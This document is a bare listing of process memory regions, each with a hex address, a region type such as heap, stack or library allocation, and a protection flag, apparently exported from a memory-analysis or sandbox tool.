1FC25680000
heap
page read and write
9A8613D000
stack
page read and write
1C55077F000
heap
page read and write
1E0E15EE000
heap
page read and write
7FFAA938D000
trusted library allocation
page execute and read and write
1FC25641000
heap
page read and write
266F3130000
heap
page read and write
1FC25B08000
direct allocation
page read and write
1DCE30EA000
heap
page read and write
93AF6FF000
stack
page read and write
1FC26610000
heap
page read and write
135F0601000
heap
page read and write
20D43D90000
heap
page read and write
2484A15F000
heap
page read and write
1F52B730000
heap
page read and write
1576CFB000
stack
page read and write
1E181CEA000
heap
page read and write
1E8E4047000
heap
page read and write
2BA9E6E1000
heap
page read and write
23AC5C4B000
heap
page read and write
270D21E2000
heap
page read and write
281FC35D000
heap
page read and write
1FC25FC9000
heap
page read and write
1FC25407000
heap
page read and write
135F0601000
heap
page read and write
20D43AFD000
heap
page read and write
1FC22CAB000
heap
page read and write
1C5500B8000
heap
page read and write
1DEE7C97000
heap
page read and write
267C197E000
heap
page read and write
236408A6000
heap
page read and write
270D223F000
heap
page read and write
1E0E1624000
heap
page read and write
1E4CF9C0000
heap
page read and write
7FFAA9690000
trusted library allocation
page read and write
1AB5E274000
heap
page read and write
1FC24F70000
direct allocation
page read and write
1C5507A0000
heap
page read and write
1FC25616000
heap
page read and write
2484A7DE000
heap
page read and write
1C55012B000
heap
page read and write
7FFB0C3F4000
unkown
page execute and read and write
1FC25368000
heap
page read and write
1FC25649000
heap
page read and write
BAC7DFF000
unkown
page read and write
1B3A8374000
heap
page read and write
1FC25656000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
270D27CA000
heap
page read and write
23AC610F000
heap
page read and write
1CEF268A000
heap
page read and write
267A7796000
heap
page read and write
1FC2573A000
heap
page read and write
1FC22D84000
heap
page read and write
22972EA0000
heap
page read and write
1E0E1571000
heap
page read and write
1E0E2FAE000
heap
page read and write
266F36D9000
heap
page read and write
1E4CFA12000
heap
page read and write
1AB5E297000
heap
page read and write
886BEFC000
stack
page read and write
1FC251AF000
heap
page read and write
266F36BC000
heap
page read and write
1E0E1585000
heap
page read and write
1E4CFC84000
heap
page read and write
2484A7D7000
heap
page read and write
2BA9E6E1000
heap
page read and write
1E0E1582000
heap
page read and write
1E4CF9E5000
heap
page read and write
1E0D64B7000
heap
page read and write
1C55013A000
heap
page read and write
1FC2535B000
heap
page read and write
1DEE7CBF000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
1407C8EB000
heap
page read and write
7FFB1C3B1000
unkown
page execute read
1FC25337000
heap
page read and write
7FFB0D745000
unkown
page readonly
1CB96DD0000
heap
page read and write
2484A7DC000
heap
page read and write
1FC25536000
heap
page read and write
1FC25601000
heap
page read and write
1FC25344000
heap
page read and write
1DD0FA93000
heap
page read and write
1FC25F87000
heap
page read and write
7FFAA9680000
trusted library allocation
page read and write
270D222F000
heap
page read and write
1DEE7CA8000
heap
page read and write
1E5FA995000
heap
page read and write
1690F8D0000
heap
page read and write
1FC25549000
heap
page read and write
7FF6DC701000
unkown
page execute read
23195FD2000
heap
page read and write
1AB5E297000
heap
page read and write
1FC24630000
heap
page read and write
7FF6DC701000
unkown
page execute read
2484A484000
heap
page read and write
1E0D64D1000
heap
page read and write
1E181D00000
heap
page read and write
1690FA00000
heap
page read and write
D6E79FF000
unkown
page read and write
15770FE000
unkown
page readonly
266F36C4000
heap
page read and write
1DD0FAE0000
heap
page read and write
26395E85000
heap
page read and write
7FFAA96E0000
trusted library allocation
page read and write
7FF74EEF9000
unkown
page write copy
157727E000
stack
page read and write
1DD0FA93000
heap
page read and write
1576DFE000
unkown
page readonly
7FFB0C2A6000
unkown
page readonly
E6C167F000
stack
page read and write
23AC610C000
heap
page read and write
16533605000
heap
page read and write
1E0E15CF000
heap
page read and write
1CEF25A9000
heap
page read and write
1FC255A2000
heap
page read and write
7FFAA953A000
trusted library allocation
page read and write
1CE587BA000
heap
page read and write
25D4E191000
heap
page read and write
2484A802000
heap
page read and write
1E5FA880000
heap
page read and write
2422BE00000
heap
page read and write
7FFB0C2A6000
unkown
page readonly
1909D570000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1E8E34FE000
trusted library allocation
page read and write
1909D450000
heap
page read and write
24B8694A000
heap
page read and write
1FC253A0000
heap
page read and write
1FC251DD000
heap
page read and write
1E0D645C000
heap
page read and write
281FC31A000
heap
page read and write
266F36A3000
heap
page read and write
1FC24F55000
heap
page read and write
1FC25320000
heap
page read and write
281FC510000
heap
page read and write
1CB96E14000
heap
page read and write
1FC25307000
heap
page read and write
1FC25320000
heap
page read and write
1E0E15FB000
heap
page read and write
1E0E1624000
heap
page read and write
7FFB24AC9000
unkown
page execute and read and write
1E0D64B8000
heap
page read and write
270D2244000
heap
page read and write
281FC318000
heap
page read and write
1407B2B0000
heap
page read and write
7FFB1C250000
unkown
page readonly
601B3FF000
stack
page read and write
1FC24F4F000
heap
page read and write
1DEE7C91000
heap
page read and write
1E0D6419000
heap
page read and write
1E0D6434000
heap
page read and write
20D43C80000
heap
page read and write
1FC22D69000
heap
page read and write
165334E0000
heap
page read and write
7FFB0C3E9000
unkown
page execute and read and write
1E181EB0000
heap
page read and write
23AC60F2000
heap
page read and write
270D227C000
heap
page read and write
267AA293000
trusted library allocation
page read and write
1CEF20AF000
heap
page read and write
1C550150000
trusted library allocation
page read and write
1CEF2683000
heap
page read and write
1E0E30AD000
heap
page read and write
2484A157000
heap
page read and write
1E7B5EB0000
heap
page read and write
D6E78FC000
stack
page read and write
2484A165000
heap
page read and write
28425E6A000
heap
page read and write
2BA9E6E1000
heap
page read and write
2484A156000
heap
page read and write
1CEF20A1000
heap
page read and write
26379E71000
heap
page read and write
2584DAC0000
heap
page read and write
266F3020000
trusted library allocation
page read and write
1DD0FAB4000
heap
page read and write
7FFAA9538000
trusted library allocation
page read and write
1FC26120000
heap
page read and write
1E0E15BA000
heap
page read and write
1407C8D4000
heap
page read and write
7FFB24ACB000
unkown
page execute and read and write
239E6253000
trusted library allocation
page read and write
1E0E1628000
heap
page read and write
7FF6DC741000
unkown
page read and write
1CEF1F90000
heap
page read and write
27EA9A78000
heap
page read and write
266F36C4000
heap
page read and write
7FFB0BAE2000
unkown
page execute and read and write
1FC25C48000
direct allocation
page read and write
267AA9F7000
trusted library allocation
page read and write
236408A4000
heap
page read and write
1E0E2FB1000
heap
page read and write
7FFAA9640000
trusted library allocation
page read and write
266F36A5000
heap
page read and write
1EA2311F000
heap
page read and write
1E0D64B7000
heap
page read and write
1FC2527D000
heap
page read and write
1FC2561E000
heap
page read and write
1CEF268E000
heap
page read and write
1E0D9B60000
direct allocation
page read and write
7FFAA9390000
trusted library allocation
page read and write
23AC5C44000
heap
page read and write
1AB5E297000
heap
page read and write
1C550123000
heap
page read and write
7FFAA9660000
trusted library allocation
page read and write
1CEF25A0000
heap
page read and write
266F30A2000
heap
page read and write
1B3A8250000
heap
page read and write
8F79BFF000
stack
page read and write
76BB9FE000
stack
page read and write
26395B30000
heap
page read and write
267AA6F9000
trusted library allocation
page read and write
73D277E000
stack
page read and write
1E0D645A000
heap
page read and write
7FFAA95C0000
trusted library allocation
page read and write
1DD0FBF9000
heap
page read and write
270D2274000
heap
page read and write
270D27BF000
heap
page read and write
26395B9D000
heap
page read and write
266F2F20000
heap
page read and write
202E5970000
heap
page read and write
1E0D9AC0000
direct allocation
page read and write
8F79B7E000
stack
page read and write
7FFB0C42E000
unkown
page execute and read and write
1FC2526D000
heap
page read and write
7FFB18B71000
unkown
page execute and read and write
1C552024000
heap
page read and write
1B3A8250000
heap
page read and write
239E6250000
trusted library allocation
page read and write
1FC25358000
heap
page read and write
1FC2532D000
heap
page read and write
7FFB0BECF000
unkown
page execute and read and write
1DD0C7C3000
heap
page read and write
7FFB0C410000
unkown
page readonly
20D43D94000
heap
page read and write
1FC2519E000
heap
page read and write
7FF6DC742000
unkown
page read and write
1FC25C44000
direct allocation
page read and write
20C72DB1000
heap
page read and write
1EA2311F000
heap
page read and write
1690F700000
heap
page read and write
239FE7FF000
heap
page read and write
2484C18E000
heap
page read and write
1C55079F000
heap
page read and write
1E8E402B000
heap
page read and write
23AC5B41000
heap
page read and write
267AAA0F000
trusted library allocation
page read and write
1FC24E75000
heap
page read and write
1FC25320000
heap
page read and write
1FC22D12000
heap
page read and write
1FC251C9000
heap
page read and write
19BC6519000
heap
page read and write
7FFB0BB30000
unkown
page execute and read and write
19BC6521000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
1FC255FA000
heap
page read and write
1C5507A2000
heap
page read and write
E6BFDFF000
unkown
page read and write
7FFB1E4CC000
unkown
page read and write
239E4A00000
heap
page execute and read and write
D7414E1000
stack
page read and write
1FC22D69000
heap
page read and write
7FFB0D745000
unkown
page readonly
1C5500A1000
heap
page read and write
1FC2535F000
heap
page read and write
1CE587D1000
heap
page read and write
1DD0FB1A000
heap
page read and write
1FC24E8B000
heap
page read and write
1407C751000
trusted library allocation
page read and write
13C876A1000
heap
page read and write
7FF6DC744000
unkown
page readonly
1FC251B0000
heap
page read and write
1E0D64AF000
heap
page read and write
135F05ED000
heap
page read and write
2C25F0B4000
heap
page read and write
15772FE000
unkown
page readonly
7FFB0B7FC000
unkown
page execute and read and write
245454E0000
heap
page read and write
1FC264B4000
heap
page read and write
1FC22D70000
heap
page read and write
1E8E3FF1000
heap
page read and write
1CEF2230000
heap
page read and write
281FC348000
heap
page read and write
1690F75B000
heap
page read and write
776F9FF000
unkown
page read and write
23AC60F7000
heap
page read and write
267C164E000
heap
page read and write
2484A152000
heap
page read and write
1FC2560F000
heap
page read and write
267A9196000
trusted library allocation
page read and write
281FC352000
heap
page read and write
135F0601000
heap
page read and write
1FC24ECD000
heap
page read and write
266F36AE000
heap
page read and write
239E4934000
heap
page read and write
1E181D00000
heap
page read and write
1E0E15D6000
heap
page read and write
1FC255D5000
heap
page read and write
1909D550000
heap
page read and write
1FC26120000
heap
page read and write
7FFB0C290000
unkown
page readonly
1FC25443000
heap
page read and write
26395E84000
heap
page read and write
1FC256FA000
heap
page read and write
23AC5AE0000
trusted library allocation
page read and write
239E4A74000
heap
page read and write
1E0D64C1000
heap
page read and write
23AC5AF8000
heap
page read and write
267AA024000
trusted library allocation
page read and write
1407B273000
heap
page read and write
1DD0C75E000
heap
page read and write
21B1C060000
heap
page read and write
2484A7E4000
heap
page read and write
76BB273000
stack
page read and write
1E8E352F000
trusted library allocation
page read and write
239FE8E0000
heap
page read and write
24545710000
heap
page read and write
1FC25F7C000
heap
page read and write
1E8E41E2000
heap
page read and write
1E7B5F04000
heap
page read and write
1CEF20A1000
heap
page read and write
1E0D7E60000
direct allocation
page read and write
267A7830000
heap
page readonly
8251DDE000
stack
page read and write
1FC2536E000
heap
page read and write
1C552026000
heap
page read and write
1DCE32C4000
heap
page read and write
1FC2573D000
heap
page read and write
1E0E1572000
heap
page read and write
1FC24E8E000
heap
page read and write
1E0D9B21000
direct allocation
page read and write
1E0E1626000
heap
page read and write
267A774F000
heap
page read and write
7FF6DC72B000
unkown
page readonly
24BA3982000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
27EA9A82000
heap
page read and write
239E6414000
heap
page read and write
1C550131000
heap
page read and write
1407C794000
trusted library allocation
page read and write
2F1957C000
stack
page read and write
2BA9E560000
heap
page read and write
1E8E34F7000
trusted library allocation
page read and write
1FC2535A000
heap
page read and write
1909D55A000
heap
page read and write
2484A178000
heap
page read and write
1E0E14A0000
heap
page read and write
281FC515000
heap
page read and write
13C87790000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
1C550134000
heap
page read and write
1FC255DE000
heap
page read and write
1E0E15EF000
heap
page read and write
1FC25641000
heap
page read and write
1FC24F56000
heap
page read and write
1FC26120000
heap
page read and write
13C87699000
heap
page read and write
1C5500C2000
heap
page read and write
266F4F65000
heap
page read and write
D7414D4000
stack
page read and write
281FC544000
heap
page read and write
281FC51E000
heap
page read and write
1FC25358000
heap
page read and write
1407B291000
heap
page read and write
1EA24C20000
heap
page read and write
1FC25616000
heap
page read and write
27EA9BC0000
heap
page read and write
23AC5B5C000
heap
page read and write
7FFAA9590000
trusted library allocation
page read and write
270D223E000
heap
page read and write
8BBB9FE000
unkown
page read and write
1E0E15DD000
heap
page read and write
2F199FF000
stack
page read and write
239FE806000
heap
page read and write
1407C280000
trusted library allocation
page read and write
1E0E160D000
heap
page read and write
7FFB0BA8B000
unkown
page execute and read and write
1FC25770000
direct allocation
page read and write
1FC25646000
heap
page read and write
20D43AFC000
heap
page read and write
266F36A4000
heap
page read and write
23DC3E30000
heap
page read and write
281FE173000
heap
page read and write
1FC2559D000
heap
page read and write
270D4054000
heap
page read and write
20C72E90000
heap
page read and write
1E8E41D5000
heap
page read and write
1C550135000
heap
page read and write
76BB37E000
stack
page read and write
23AC79F4000
heap
page read and write
1E8E34F3000
trusted library allocation
page read and write
1C5500B0000
heap
page read and write
2CFCFCE000
stack
page read and write
23AC6129000
heap
page read and write
1E0D99A0000
direct allocation
page read and write
1FC255C7000
heap
page read and write
270D223A000
heap
page read and write
1E0E15EE000
heap
page read and write
24B86850000
heap
page read and write
267C199D000
heap
page read and write
239F6761000
trusted library allocation
page read and write
1E0D64DA000
heap
page read and write
7FFAA9790000
trusted library allocation
page read and write
7FFAA9650000
trusted library allocation
page read and write
1CEF25AF000
heap
page read and write
1F52B810000
heap
page read and write
28425E6C000
heap
page read and write
BAC7CFC000
stack
page read and write
8F79AFF000
stack
page read and write
1CEF2593000
heap
page read and write
266F36AE000
heap
page read and write
1C550089000
heap
page read and write
1690F754000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
7FFAA96A0000
trusted library allocation
page read and write
1DD0C759000
heap
page read and write
1CEF25B9000
heap
page read and write
28425E58000
heap
page read and write
1FC252EA000
heap
page read and write
1690F75B000
heap
page read and write
2484A7E2000
heap
page read and write
7FFAA96D0000
trusted library allocation
page read and write
267AA430000
trusted library allocation
page read and write
1EA2311F000
heap
page read and write
7FF6DC744000
unkown
page readonly
2484A45E000
heap
page read and write
270D226C000
heap
page read and write
1DD0C792000
heap
page read and write
D5944FB000
stack
page read and write
7FFB0C2B0000
unkown
page read and write
23AC79E0000
heap
page read and write
D8EBDFC000
stack
page read and write
1FC24A30000
direct allocation
page read and write
2484A170000
heap
page read and write
7FFB0C290000
unkown
page readonly
2484A7E1000
heap
page read and write
1A2CE3B0000
heap
page read and write
1AB5E2A3000
heap
page read and write
267B9111000
trusted library allocation
page read and write
7FFAA95A0000
trusted library allocation
page read and write
1E7B5EA0000
heap
page read and write
1CEF25A9000
heap
page read and write
1FC255F2000
heap
page read and write
9A861BE000
stack
page read and write
270D4042000
heap
page read and write
B2B897F000
stack
page read and write
1CEF2097000
heap
page read and write
1407B200000
heap
page read and write
23AC5B07000
heap
page read and write
23AC5AC0000
heap
page read and write
1E0E2F90000
heap
page read and write
7FFB0BF6C000
unkown
page execute and read and write
1C550150000
trusted library allocation
page read and write
1C5500AF000
heap
page read and write
1FC25602000
heap
page read and write
1C5500E3000
heap
page read and write
266F36C3000
heap
page read and write
1DD0FB2A000
heap
page read and write
16533617000
heap
page read and write
1FC25641000
heap
page read and write
2484A7E8000
heap
page read and write
1DD0E917000
heap
page read and write
7FFB0C5F1000
unkown
page execute and read and write
266F3097000
heap
page read and write
2484A170000
heap
page read and write
1CEF25A9000
heap
page read and write
7FFB0C5F0000
unkown
page readonly
267B9141000
trusted library allocation
page read and write
1FC25C4C000
direct allocation
page read and write
1407C190000
trusted library section
page readonly
1E0D648D000
heap
page read and write
1FC2611B000
heap
page read and write
1FC2560F000
heap
page read and write
7FF74EEE0000
unkown
page readonly
1FC25E2D000
heap
page read and write
1FC2567A000
heap
page read and write
1C550763000
heap
page read and write
51C291C000
stack
page read and write
1E0D645C000
heap
page read and write
2484A7D0000
heap
page read and write
1DD0E240000
heap
page read and write
26A1C4C0000
heap
page read and write
1FC25641000
heap
page read and write
281FC333000
heap
page read and write
1407B279000
heap
page read and write
7FF6DC72B000
unkown
page readonly
1FC24F55000
heap
page read and write
1FC2533E000
heap
page read and write
270D226A000
heap
page read and write
7FFB24AC0000
unkown
page readonly
270D2100000
heap
page read and write
1E0E2FB1000
heap
page read and write
1FC25358000
heap
page read and write
2484C194000
heap
page read and write
1FC22D29000
heap
page read and write
1CB96DF0000
heap
page read and write
2BA9E670000
heap
page read and write
D8143FF000
stack
page read and write
165335FD000
heap
page read and write
51D4778000
stack
page read and write
23AC5B5A000
heap
page read and write
281FC339000
heap
page read and write
1CEF204F000
heap
page read and write
202E5781000
heap
page read and write
1E181D00000
heap
page read and write
270D4044000
heap
page read and write
239E7ED3000
trusted library allocation
page read and write
1DEE7CAC000
heap
page read and write
281FC3F5000
heap
page read and write
1DD0FB2B000
heap
page read and write
165335EF000
heap
page read and write
1E8E36C4000
heap
page read and write
1FC255D6000
heap
page read and write
1FC25D57000
heap
page read and write
24BA3992000
heap
page read and write
1C550130000
heap
page read and write
1DD0C808000
heap
page read and write
272B2FC000
stack
page read and write
1E8E3525000
trusted library allocation
page read and write
1E0E1617000
heap
page read and write
2484A176000
heap
page read and write
87C00FE000
stack
page read and write
1FC25681000
heap
page read and write
23AC5B2A000
heap
page read and write
1E0E1604000
heap
page read and write
1CEF2093000
heap
page read and write
19DD4F11000
heap
page read and write
1407C780000
trusted library allocation
page read and write
20C72DB1000
heap
page read and write
1CEF223B000
heap
page read and write
267AA61A000
trusted library allocation
page read and write
1FC2533A000
heap
page read and write
15C99A7A000
heap
page read and write
87C01FE000
stack
page read and write
1EA2311F000
heap
page read and write
281FE184000
heap
page read and write
65B06FC000
stack
page read and write
1FC2530F000
heap
page read and write
1E0D64A6000
heap
page read and write
24BA3992000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
1407C902000
heap
page read and write
1DD0FB13000
heap
page read and write
267AAEEA000
trusted library allocation
page read and write
D7418FE000
stack
page read and write
7FFAA95F0000
trusted library allocation
page read and write
7FFB0C290000
unkown
page readonly
1E0E2FB1000
heap
page read and write
23640869000
heap
page read and write
270D227C000
heap
page read and write
1407C750000
trusted library allocation
page read and write
245455DB000
heap
page read and write
267AAF2F000
trusted library allocation
page read and write
23AC79F4000
heap
page read and write
1A2CE3D0000
heap
page read and write
270D2207000
heap
page read and write
267A7580000
heap
page read and write
267C16F6000
heap
page execute and read and write
1E0E30A4000
heap
page read and write
1407CAF0000
remote allocation
page read and write
23AC5B6D000
heap
page read and write
7FFAA9501000
trusted library allocation
page read and write
19DD4F11000
heap
page read and write
1FC252B9000
heap
page read and write
15C99A70000
heap
page read and write
27E84CF0000
heap
page read and write
281FC34E000
heap
page read and write
1E0E1592000
heap
page read and write
135F0601000
heap
page read and write
1FC25F76000
heap
page read and write
7FFAA94F0000
trusted library allocation
page read and write
1FC25299000
heap
page read and write
1C550762000
heap
page read and write
1CEF40B0000
heap
page read and write
1FC25371000
heap
page read and write
7FFB0D736000
unkown
page readonly
244EE390000
heap
page read and write
2484A0C0000
heap
page read and write
1FC2611C000
heap
page read and write
7FFB0BB91000
unkown
page execute and read and write
1E0E15B4000
heap
page read and write
A2D7CFC000
stack
page read and write
1FC25626000
heap
page read and write
7FFB0C2B0000
unkown
page read and write
1E0E15E5000
heap
page read and write
281FC2F7000
heap
page read and write
1E8E403F000
heap
page read and write
7FF74EEF8000
unkown
page read and write
1E0E15BE000
heap
page read and write
1E0E15B4000
heap
page read and write
1FC22D24000
heap
page read and write
1C552200000
heap
page read and write
28425E4A000
heap
page read and write
1FC2527D000
heap
page read and write
7FFB1E471000
unkown
page execute and read and write
7FFAA96B8000
trusted library allocation
page read and write
266F3083000
heap
page read and write
7FFAA93DC000
trusted library allocation
page execute and read and write
266F3090000
heap
page read and write
1DD0C808000
heap
page read and write
7FFAA96B0000
trusted library allocation
page read and write
1BCD0CA0000
heap
page read and write
22972E00000
heap
page read and write
1FC24F6E000
heap
page read and write
1C5500B1000
heap
page read and write
7FFB0B804000
unkown
page execute and read and write
29AC2362000
heap
page read and write
7FFB24ACC000
unkown
page execute and write copy
1FC25170000
heap
page read and write
1FC2613B000
heap
page read and write
1FC25C2C000
direct allocation
page read and write
1FC25635000
heap
page read and write
7FFB0C5C0000
unkown
page readonly
7FFB1C3C7000
unkown
page readonly
51D41FE000
stack
page read and write
1FC24F4F000
heap
page read and write
1DEE7C20000
heap
page read and write
E6C131B000
stack
page read and write
1FC25602000
heap
page read and write
1FC22D86000
heap
page read and write
1FC24F4C000
heap
page read and write
2DE1CC00000
heap
page read and write
281FC325000
heap
page read and write
1CEF2075000
heap
page read and write
1FC2536A000
heap
page read and write
270D27AC000
heap
page read and write
26379E5A000
heap
page read and write
281FC3F0000
heap
page read and write
1C5500C2000
heap
page read and write
7FFB1BB10000
unkown
page readonly
21B1BD80000
heap
page read and write
23AC60FA000
heap
page read and write
7FFB0BFB6000
unkown
page execute and read and write
1E0D64B7000
heap
page read and write
281FC341000
heap
page read and write
7FFAA9540000
trusted library allocation
page execute and read and write
281FC3F7000
heap
page read and write
1FC22D69000
heap
page read and write
1FC22D71000
heap
page read and write
1E8E3FF1000
heap
page read and write
1C550782000
heap
page read and write
1E4CFA1D000
heap
page read and write
281FE175000
heap
page read and write
239E491A000
heap
page read and write
2484A7F9000
heap
page read and write
1CEF268E000
heap
page read and write
2DE1CB00000
heap
page read and write
267C19C5000
heap
page read and write
1E0E15F9000
heap
page read and write
1E8E34FE000
trusted library allocation
page read and write
23AC79EE000
heap
page read and write
1E8E3518000
trusted library allocation
page read and write
26395BB0000
heap
page read and write
7FFB1E4C0000
unkown
page readonly
1BCD0D80000
heap
page read and write
267AAA5D000
trusted library allocation
page read and write
B26CBEF000
stack
page read and write
1FC26164000
heap
page read and write
270D27C9000
heap
page read and write
239E67D9000
trusted library allocation
page read and write
23AC612C000
heap
page read and write
23AC6117000
heap
page read and write
76BC44E000
stack
page read and write
4C539AB000
stack
page read and write
1407B313000
heap
page read and write
1E0D9BAD000
direct allocation
page read and write
1E8E3525000
trusted library allocation
page read and write
1407BB1A000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
281FC41A000
heap
page read and write
1FC251C9000
heap
page read and write
23AC5B57000
heap
page read and write
51D49FF000
stack
page read and write
7FFAA9436000
trusted library allocation
page read and write
1FC2560E000
heap
page read and write
1E0D6471000
heap
page read and write
1DD0FAB4000
heap
page read and write
2BA9E6E1000
heap
page read and write
1407B243000
heap
page read and write
1E8E3FE2000
heap
page read and write
2940C32B000
heap
page read and write
1FC251AB000
heap
page read and write
270D21DF000
heap
page read and write
1E5FA860000
heap
page read and write
1AB5E272000
heap
page read and write
1407C82C000
heap
page read and write
23195DE0000
heap
page read and write
2DE1CA20000
heap
page read and write
1407C854000
heap
page read and write
1FC25BCC000
direct allocation
page read and write
1FC2533A000
heap
page read and write
25D4E120000
heap
page read and write
81CE0FF000
stack
page read and write
1E5FA782000
heap
page read and write
239FEA5C000
heap
page read and write
23AC5B59000
heap
page read and write
239E491D000
heap
page read and write
82523AE000
stack
page read and write
1AD18B31000
heap
page read and write
1FC25C64000
direct allocation
page read and write
1FC2573A000
heap
page read and write
B26CB67000
stack
page read and write
7FFAA940C000
trusted library allocation
page execute and read and write
1E0D649E000
heap
page read and write
1E0E1595000
heap
page read and write
1E8E34FB000
trusted library allocation
page read and write
1C55077C000
heap
page read and write
1FC2566D000
heap
page read and write
1DEE7C60000
heap
page read and write
6089D0F000
stack
page read and write
29AC2362000
heap
page read and write
1407C790000
trusted library allocation
page read and write
7FFB0C291000
unkown
page execute read
7FFAA9610000
trusted library allocation
page read and write
26395BA7000
heap
page read and write
1E0D6465000
heap
page read and write
1EA23100000
heap
page read and write
1FC25C1C000
direct allocation
page read and write
270D2454000
heap
page read and write
1FC25359000
heap
page read and write
1690F738000
heap
page read and write
16533737000
heap
page read and write
1FC25550000
heap
page read and write
7FFB0C2B2000
unkown
page readonly
76BAFDE000
stack
page read and write
27EA9980000
heap
page read and write
270D227C000
heap
page read and write
19DD4F11000
heap
page read and write
1FC255A2000
heap
page read and write
7FFAA9406000
trusted library allocation
page read and write
22972FA0000
heap
page read and write
270D2120000
heap
page read and write
157807E000
stack
page read and write
23AC5B5D000
heap
page read and write
CDBDD7F000
stack
page read and write
7FFB0C291000
unkown
page execute read
1FC255FA000
heap
page read and write
EE6D7BF000
stack
page read and write
1690F74D000
heap
page read and write
1C5500BD000
heap
page read and write
886C0FF000
stack
page read and write
2484A137000
heap
page read and write
7FFAA96A9000
trusted library allocation
page read and write
8251BD9000
stack
page read and write
1700B897000
heap
page read and write
1C552010000
heap
page read and write
B08A53B000
stack
page read and write
1EA2311F000
heap
page read and write
2484C186000
heap
page read and write
1FC2536B000
heap
page read and write
270D222A000
heap
page read and write
1FC22D6A000
heap
page read and write
281FC3E8000
heap
page read and write
1FC25569000
heap
page read and write
1EA23108000
heap
page read and write
1DEE7F44000
heap
page read and write
281FC250000
heap
page read and write
1407C6D0000
trusted library allocation
page read and write
1DD0F4C8000
heap
page read and write
281FC517000
heap
page read and write
1E4CF9E5000
heap
page read and write
1DD0C734000
heap
page read and write
1E0E1571000
heap
page read and write
28425E35000
heap
page read and write
1DD0C797000
heap
page read and write
1C550135000
heap
page read and write
28425E3B000
heap
page read and write
267C1916000
heap
page read and write
1CEF2092000
heap
page read and write
266F3200000
heap
page read and write
267C19BA000
heap
page read and write
266F4F53000
heap
page read and write
1E8E34FE000
trusted library allocation
page read and write
28425E5D000
heap
page read and write
1FC2533E000
heap
page read and write
83C6EFF000
stack
page read and write
1FC255B2000
heap
page read and write
266F3085000
heap
page read and write
2090AA80000
heap
page read and write
239FE81D000
heap
page read and write
239F6919000
trusted library allocation
page read and write
22972EC2000
heap
page read and write
15771FE000
unkown
page readonly
1FC2533A000
heap
page read and write
1FC2560E000
heap
page read and write
16533751000
heap
page read and write
281FC409000
heap
page read and write
1E8E34FF000
trusted library allocation
page read and write
27EA9BB4000
heap
page read and write
7FFAA95D0000
trusted library allocation
page read and write
7FFAA9470000
trusted library allocation
page execute and read and write
2484A118000
heap
page read and write
1C550784000
heap
page read and write
2322B390000
heap
page read and write
25D4E191000
heap
page read and write
2484C196000
heap
page read and write
1E0D64E1000
heap
page read and write
2422BC20000
heap
page read and write
1E0E15D6000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
1E8E41D5000
heap
page read and write
2584D9D0000
heap
page read and write
2484A137000
heap
page read and write
7FFB0C3C4000
unkown
page execute and read and write
544A4FB000
stack
page read and write
2484A7EC000
heap
page read and write
1CE587CB000
heap
page read and write
D1D1E7C000
stack
page read and write
239E49C0000
heap
page readonly
7FFAA9600000
trusted library allocation
page read and write
270D27A0000
heap
page read and write
1FC2519E000
heap
page read and write
1E0E15B6000
heap
page read and write
7FFB0C2A6000
unkown
page readonly
1CEF1FE0000
heap
page read and write
1E8E41D0000
heap
page read and write
26395E80000
heap
page read and write
19DD4F11000
heap
page read and write
1DCE30F2000
heap
page read and write
239FE79C000
heap
page read and write
1E0E160D000
heap
page read and write
1FC25368000
heap
page read and write
2CFCBED000
stack
page read and write
266F3085000
heap
page read and write
19BC6519000
heap
page read and write
1C552014000
heap
page read and write
1DD0FAA0000
heap
page read and write
1F52B8B0000
heap
page read and write
266F36E4000
heap
page read and write
1E0E15DF000
heap
page read and write
1CEF20A7000
heap
page read and write
1C55012A000
heap
page read and write
236408BE000
heap
page read and write
1E8E405B000
heap
page read and write
1E0E17EC000
heap
page read and write
1E0D64C3000
heap
page read and write
267B93FB000
trusted library allocation
page read and write
236408C1000
heap
page read and write
2BA9E7C0000
heap
page read and write
1CEF2680000
heap
page read and write
15778FE000
unkown
page readonly
7FFAA9350000
trusted library allocation
page read and write
1E8E41E2000
heap
page read and write
267C160A000
heap
page read and write
1DD0C739000
heap
page read and write
76BBA7B000
stack
page read and write
1E0D6460000
heap
page read and write
1FC25652000
heap
page read and write
24B86AB4000
heap
page read and write
1C550133000
heap
page read and write
1DEE7CBB000
heap
page read and write
9A860B8000
stack
page read and write
1FC251C9000
heap
page read and write
244EE0C0000
heap
page read and write
270D2224000
heap
page read and write
20D43AE7000
heap
page read and write
23AC6134000
heap
page read and write
1FC252E8000
heap
page read and write
7FF6DC700000
unkown
page readonly
1CEF2591000
heap
page read and write
1690F74B000
heap
page read and write
1CEF25B5000
heap
page read and write
239FE760000
heap
page read and write
1FC253B0000
heap
page read and write
2C25EF10000
heap
page read and write
1FC25325000
heap
page read and write
7FFB0C2B5000
unkown
page readonly
1FC25627000
heap
page read and write
1FC2531B000
heap
page read and write
1407B1E0000
trusted library section
page read and write
28425E3B000
heap
page read and write
1FC2533A000
heap
page read and write
1E0D64C1000
heap
page read and write
1AB5E2A3000
heap
page read and write
7FFB0C438000
unkown
page execute and read and write
266F36AA000
heap
page read and write
1B3A8150000
heap
page read and write
1FC25626000
heap
page read and write
1E8E34FB000
trusted library allocation
page read and write
267A772F000
heap
page read and write
1E8E352F000
trusted library allocation
page read and write
281FC409000
heap
page read and write
239FE8D0000
heap
page execute and read and write
1DCE3080000
heap
page read and write
267A7770000
heap
page read and write
9E5D4C000
stack
page read and write
1E5FA772000
heap
page read and write
2422BE00000
heap
page read and write
1CEF268A000
heap
page read and write
267AA8CF000
trusted library allocation
page read and write
1E8E352F000
trusted library allocation
page read and write
1CEF2588000
heap
page read and write
1CEF1FB0000
trusted library allocation
page read and write
1407B1A0000
heap
page read and write
281FC40A000
heap
page read and write
1FC25C38000
direct allocation
page read and write
1E8E34FB000
trusted library allocation
page read and write
1FC25C58000
direct allocation
page read and write
2584DACB000
heap
page read and write
1E8E36C0000
heap
page read and write
7FFB0BB62000
unkown
page execute and read and write
1E8E405B000
heap
page read and write
1CEF25AA000
heap
page read and write
266F4F5E000
heap
page read and write
266F36B7000
heap
page read and write
1FC2536E000
heap
page read and write
